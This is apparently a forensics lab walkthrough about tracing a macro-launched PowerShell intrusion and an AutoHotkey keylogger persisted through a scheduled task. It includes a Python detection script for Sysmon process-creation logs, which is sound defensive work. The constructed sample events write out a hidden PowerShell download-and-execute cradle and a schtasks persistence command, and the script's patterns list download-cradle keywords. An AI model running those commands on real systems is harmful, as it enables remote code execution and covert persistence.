Walkthrough

Introduction

This lab walks through a realistic intrusion scenario that begins with a malicious Microsoft Word document, a common initial access method used by threat actors. Once the victim enables macros, the document silently launches a PowerShell script that starts the attack chain. That script downloads and executes additional payloads, which establish communication with a command and control (C2) server.

From there, the attacker issues commands to conduct host and network reconnaissance, running native Windows utilities through PowerShell. For persistence, the attacker creates a scheduled task that runs a customized AutoHotkey-based keylogger. The keylogger captures keystrokes in real time and writes them to disk for later collection.

Throughout the attack, Windows PowerShell and Sysmon logs capture critical telemetry, giving you visibility into the attacker's actions. By analyzing these logs you will be able to reconstruct the full sequence of events, from the initial macro execution to the final stage of data collection. This lab will strengthen your skills in investigating script-based attacks, identifying persistence mechanisms, and performing Windows-based forensic analysis.
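The chain described above (Office document spawning PowerShell, a download cradle, a scheduled task pointing at a user-writable AutoHotkey binary, and the Task Scheduler later launching that binary) can be pulled out of Sysmon Event ID 1 (ProcessCreate) records by linking ProcessGuid to ParentProcessGuid and applying a few rules to each record. The script below is an added example and is not part of the BlueYard lab material; it assumes the events have already been exported as Python dicts with the standard Sysmon field names, and every host name, path, GUID, URL and command line in SAMPLE_EVENTS is constructed for illustration.

```python
import re

# Constructed sample Sysmon Event ID 1 (ProcessCreate) records. Every path,
# GUID, URL and command line below is invented for this example.
SAMPLE_EVENTS = [
    {"ProcessGuid": "{G1}", "ParentProcessGuid": "{G0}",
     "Image": r"C:\Windows\explorer.exe", "ParentImage": r"C:\Windows\System32\userinit.exe",
     "CommandLine": "explorer.exe", "ParentCommandLine": "userinit.exe"},
    {"ProcessGuid": "{G2}", "ParentProcessGuid": "{G1}",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\alice\Downloads\Invoice_4471.docm"',
     "ParentCommandLine": "explorer.exe"},
    {"ProcessGuid": "{G3}", "ParentProcessGuid": "{G2}",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://198.51.100.7/s2.ps1')\"",
     "ParentCommandLine": r'"WINWORD.EXE" /n "C:\Users\alice\Downloads\Invoice_4471.docm"'},
    {"ProcessGuid": "{G4}", "ParentProcessGuid": "{G3}",
     "Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'schtasks.exe /create /f /sc minute /mo 5 /tn "OfficeSync" '
                    r'/tr "C:\Users\alice\AppData\Roaming\ahk\AutoHotkey.exe C:\Users\alice\AppData\Roaming\ahk\sync.ahk"',
     "ParentCommandLine": "powershell.exe -w hidden -ep bypass -c ..."},
    # Launched later by the Task Scheduler service host, not by the PowerShell tree.
    {"ProcessGuid": "{G5}", "ParentProcessGuid": "{G9}",
     "Image": r"C:\Users\alice\AppData\Roaming\ahk\AutoHotkey.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r'"C:\Users\alice\AppData\Roaming\ahk\AutoHotkey.exe" C:\Users\alice\AppData\Roaming\ahk\sync.ahk',
     "ParentCommandLine": r"C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule"},
    # Benign noise: a browser started from the desktop.
    {"ProcessGuid": "{G6}", "ParentProcessGuid": "{G1}",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": '"chrome.exe"', "ParentCommandLine": "explorer.exe"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
CRADLE_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-expression|\biex\b", re.I)
USER_WRITABLE_RE = re.compile(r"\\users\\|\\appdata\\|\\temp\\|\\programdata\\", re.I)
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files")


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(ev):
    """Return the names of the detection rules that one ProcessCreate record triggers."""
    hits = []
    img, parent = basename(ev["Image"]), basename(ev["ParentImage"])
    cmd = ev["CommandLine"]
    # Rule 1: an Office application spawning a script interpreter (macro execution).
    if parent in OFFICE_APPS and img in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    # Rule 2: PowerShell with a download-and-execute cradle on its command line.
    if img in {"powershell.exe", "pwsh.exe"} and CRADLE_RE.search(cmd):
        hits.append("powershell_download_cradle")
    # Rule 3: schtasks /create whose action (/tr) lives in a user-writable location.
    if img == "schtasks.exe" and re.search(r"/create", cmd, re.I):
        m = re.search(r'/tr\s+"?([^"]+)', cmd, re.I)
        action = m.group(1) if m else ""
        if USER_WRITABLE_RE.search(action):
            hits.append("schtasks_user_writable_action")
    # Rule 4: the Task Scheduler host (svchost -s Schedule) starting a binary outside
    # Windows / Program Files, which is how the persisted keylogger shows up later.
    if parent == "svchost.exe" and "-s schedule" in ev["ParentCommandLine"].lower() \
            and not ev["Image"].lower().startswith(TRUSTED_PREFIXES):
        hits.append("scheduled_task_runs_user_binary")
    return hits


def reconstruct_chain(events, guid):
    """Walk ParentProcessGuid links back to the root and return the image names, root first."""
    by_guid = {ev["ProcessGuid"]: ev for ev in events}
    chain = []
    while guid in by_guid:
        chain.append(basename(by_guid[guid]["Image"]))
        guid = by_guid[guid]["ParentProcessGuid"]
    return list(reversed(chain))


def analyze(events):
    """Return (guid, rule_hits, ancestry_chain) for every record that triggers a rule."""
    findings = []
    for ev in events:
        hits = evaluate(ev)
        if hits:
            findings.append((ev["ProcessGuid"], hits, reconstruct_chain(events, ev["ProcessGuid"])))
    return findings


if __name__ == "__main__":
    for guid, hits, chain in analyze(SAMPLE_EVENTS):
        print(f"{guid}: {', '.join(hits)}  <-  {' > '.join(chain)}")
```

Rule 4 deliberately does not depend on the ancestry walk: once the task fires, the keylogger's parent is the Task Scheduler's svchost.exe, so the process tree alone will not connect it back to the macro. Tying the two halves together is done by matching the /tr action recorded in the schtasks.exe command line against the image later launched from svchost.exe, which is exactly the pivot the lab's log review asks you to make.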
